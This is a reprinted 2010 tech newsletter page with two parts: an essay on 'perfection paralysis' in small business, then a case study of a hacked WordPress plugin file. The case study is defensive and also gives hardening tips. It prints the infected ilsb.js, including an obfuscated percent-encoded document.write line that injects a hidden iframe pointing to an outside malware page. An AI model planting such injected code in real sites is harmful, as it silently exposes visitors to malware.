Technical Tidbits™

This is a reprint of a recent article under our Business Bits section of the Technical Tidbits™ Newsletter. I was asked by a subscriber to put it online so it can be accessed by non-subscribers.

If you like the article, I recommend that you fill in your e-mail address on the upper right and click the subscribe button to subscribe to our newsletters.

---

PERFECTION PARALYSIS
Technical Tidbits™ Newsletter
February, 2010

I was agonizing over what to write about in this portion of the newsletter when a conference call this morning provided me with the content!

This particular call involved me, a staff member that we call our resident marketing guru, and a gentleman he had connected with that needed some help. As it was explained to me, the man needed my help because he had all this content and was not selling a thing.

The first warning signal I received about this man’s issue was that he had published two books on his area of expertise and refused to sell them on Amazon because they require a commission. I asked if he had sold any on his own, to which he replied, “a few.”

Before I could hit him with the fact that Amazon would be much better at reaching an audience then he could ever hope to reach, he said something that made everything quite clear. He said that much of his accompanying material was not perfected yet and therefore he couldn’t proceed with his sales of the books or his courses until it had been “perfected.”

Now, to back step a moment here, my degree is in Applied Behavioral Science and I/O Psychology (Industrial/Organizational). I took that educational path because it is what corporate trainers do, which was what I wanted to do in my career – train people in technology. Much of what I learned was not only about how people learn, but barriers to learning. Often times, these barriers can be emotional or psycho-social within the person themselves.

For example, I was once hired by Motorola Corporation to personally tutor 1-on-1 an executive assistant in the fine art of using PowerPoint. Within two visits to this young ladies desk, I told Motorola that she was un-trainable. There was nothing wrong with her mind; she was a very bright young woman. What was wrong was she was unwilling to learn. She had a mindset that PowerPoint presentations were beneath her and therefore had no intention of ever learning it. Administrative assistants did PowerPoint presentations – not executive assistants!

That being said, I recognized a pattern in this gentleman on the conference call. So I probed further. The man has literally hundreds of training courses and material available but has not sold a single item. His insistence on the fact that none of the developed materials had been “perfected” and the constant reaffirmation that his content was so unique that it couldn’t be sold the way I was suggesting (online) led me straight to his problem.

So, I asked him if he knew of some very powerful people in his field and I named the names of 5 people I knew carried a lot of weight in his area of expertise. He agreed that he indeed knows of them and that they were fine examples of the field. I then went on to inform him that these 5 people were selling EXACTLY the way I was telling him to sell his material. These people were involved in online marketing, had a website, engaged in social media, and so on.

He reiterated that he could not sell online.

I know many of you reading this are shaking your head because you know how well online marketing and sales works and you know that your business probably lives and dies by it!

But the point I want to make is that this man was not blind to the opportunities technology is offering him, he’s suffering from Perfection Paralysis.

One of the comments he made during the conversation was that he was spending much of his time packaging and shipping his content. (To who, I don’t know because he still said he wasn’t selling anything!) So, I diffused this objection and told him to go check out CafePress.com. They have an excellent print-on-demand program that could free up his time.

But again, objection after objection when our marketing guru pressed him to take one step forward into the online arena, was always the fact that it needed “perfecting.”

I don’t know about you, but I know I’m guilty of that same paralysis in my own business. The newsletter has to be just perfect or I can’t send it. The course has to be just perfect or I can’t post it and sell it. And so on…..

When you get caught in the trap of Perfection Paralysis in your business, there is a tip you can take away from Bill Gates and Microsoft. If Bill Gates and Microsoft waited for the operating systems and products they produce to be perfect, do you think you’d be reading this on a Windows operating system?  Do you think Microsoft would have become such a large corporation?

Now don’t get me wrong! I’m not telling you to plan your business model around Microsoft and issue products that require patch after patch and only works some of the time. That’s not my point.

My point is that sometimes it just has to be GEFN – Good Enough For Now.

And with that closing comment, I’m going to take my own advice and get this newsletter sent!

In my last blog post, WP Blog Owners! Check Your .htaccess Files, I said I would follow-up with more details as they became available to me.

First, I would like to thank Sam McArthur of Forty First Internet Marketing Consultancy & SEO Specialists for allowing me to use her unfortunate WordPress hack as a case study for others.

I still do not know how the hacker accessed the .htaccess file. I have now downloaded the raw server logs from her web server to perform forensics on the traffic and what was accessed during the time of the hack.

During my investigation, another interesting development that I was just told about, and that is another user of the web hosting service was also hacked in a similar method.

So now, I was looking into a server vulnerability. I know I run the risk of a smart hacker figuring out the web host and attempting a future hack on other sites but, that leads us to the issue of the web hosting company making sure they are protecting their users!

I’ve commented repeatedly about how secure LunarPages* is and how they do everything they can to protect their users.  So, suffice it to say that this web site is not with LunarPages*. (Need I say more?)

That being said, as it turns out, it was not a server vulnerability. And I want to publicly say, “THANK YOU” to my partner and co-instructor, Anthony Valente, CEH, of Network Defense Solutions for finding what I missed!

I poured over the SQL database dump for over 48 hours (not consecutively) and compared WP files like the WP_config.php and such and could not find anything except a strange base64-65 code that I could not isolate.

I searched online for other answers and read reports of hack after hack as to how they were being done and still could not find it.

I looked at individual plug-in file JPG files and upload JPG files to see if they were actually pictures or a spoofed file name containing actual code. Still nothing.

After more than 48 hours of research and Sam’s help with doing her own research, I finally threw my hands up in the air and sent what I knew to Anthony along with the files. It took him 5 minutes to isolate the code I had found!

Now, I’m going to share this with you. This hack was a Cross-site Scripting (XSS) hack.

The code resided in a plug-in called, I Love Social Bookmarking and the file affected resided in:  wp-content/plugins/i-love-social-bookmarking/includes/

The actual file was named: ilsb.js

The normal ilsb.js file should read:

// JavaScript Document
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The hacked code within Sam’s file read:

// JavaScript Document
document .write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%65%62%2D%62%75%72%65%61%75%2E%63%6F%6D%2F%74%65%6D%70%6C%61%74%65%73%2F%62%65%65%7A%2F%6D%65%6E%75%2E%70%68%70%22%20%77%69%64%74%68%3D%22%30%22%20%68%65%69%67%68%74%3D%22%30%22%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%22%30%22%3E%3C%2F%69%66%72%61%6D%65%3E'));
jQuery(document).ready(function()
{
jQuery(".ilsb-parent").hover(
function()
{
jQuery(".ilsb-child").show();
},
function()
{
jQuery(".ilsb-child").hide();
}
);

jQuery(".ilsb-parent > a").click(function()
{
return false;
});
});

The offending code is the one that writes the document and includes all the percent signs (%).

This code inserted an iframe in the top of the page which redirected to a malware site.

Because of this, Sam was starting to get blacklisted on Google and Bing and her site was beginning to be blocked by software that uses Google malware detection and that included Firefox!

I am happy to report that Sam is off the blacklist and back to running her website as normal after I cleaned up the code and secured the site.

But here is your take-away from this experience: secure you WP blog!

1. Remove the Admin account by logging in and setting up a new administrator account with a totally different name.  Assign it the administrator priviladges.
2. Log out and log back in under the new name.
3. Delete the admin account and WordPress will ask you if you’d like to assign the posts to another user. Assign them to your new user name.
4. Install the Bad Behavior Plug-in and configure it properly.

If you scroll down to the very bottom of this blog, you will see that it regularly blocks over 400 attempts to access this blog per week!

5. Make sure you config and get the API key for Akismet.
6. Delete your spam regularly! I have a theory about an attack vector but I’m not prepared to publish it yet and suffice it to say that I believe spam comments with links may be key in this method.
7. Make sure that all users – if you allow them to register – are configured to be subscribers only!
8. If you suspect foul play of any sort, search for a hidden user. To do that:

• Click on your Users section.
• Click on the link to the Administrators page.
• Right click on the page and choose: View Source.
• Look for the following code on that source page:  tbody id="users".  It should be toward the bottom. If you have 1 registered administrator, there should only be one name in that list. If you have 2, then there should only be two names, and so on.
• If you find one, you will have to delete this person out of your SQL database.

I hope this is of service to you and again, a special thanks to Sam McArthur for allowing me to share her misfortune in the effort to educate others, and Anthony Valente, my partner and co-instructor for once again coming to my rescue!

TECHS: Please read: NOS Microsystems Adobe getPlus Helper ActiveX control contains stack buffer overflow Vulnerability Note, located here:  https://www.kb.cert.org/vuls/id/773545

And, Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method Vulnerability Note, located here: https://www.kb.cert.org/vuls/id/508357

*TIIM: Truth in Internet Marketing – the LunarPages link is my affiliate link and I earn a $65 commission if you sign up using my link. However, that is NOT the reason I recommend them! I recommend them because they are GOOD, REASONABLY PRICED, and SECURE! It’s the host I use and I recommend all my clients use!

Talk to me LIVE this Wednesday, February 10th at 10 AM CDT on my BlogTalk Radio show!

The Official Blurb:

Everyone’s got questions! – Ask your question on this special episode of Technical Tidbits with Debbie Mahler. One full hour of taking your questions either on the phone or in the live chat! You’ll have access to your own technical guru for a full hour FREE!  And as she tells her students: The only stupid question is the one left unasked! Get your questions answered!

Everyone from advanced techies to Grandma — who just wants to download photos of her grandbabies from Facebook — will hear something of value on this special edition of Technical Tidbits with Debbie Mahler.

It’s all about YOUR Frequently Asked Questions. And that means questions from you, our loyal and beloved listeners. So phone in or chat live! Here’s your chance to have all your burning technology questions answered by the expert.

Join me LIVE!

Call In Phone Number: (718) 506-1315

Or go to the show page:  Technical Tidbits on BlogTalk Radio, and scroll down to see the live chat box!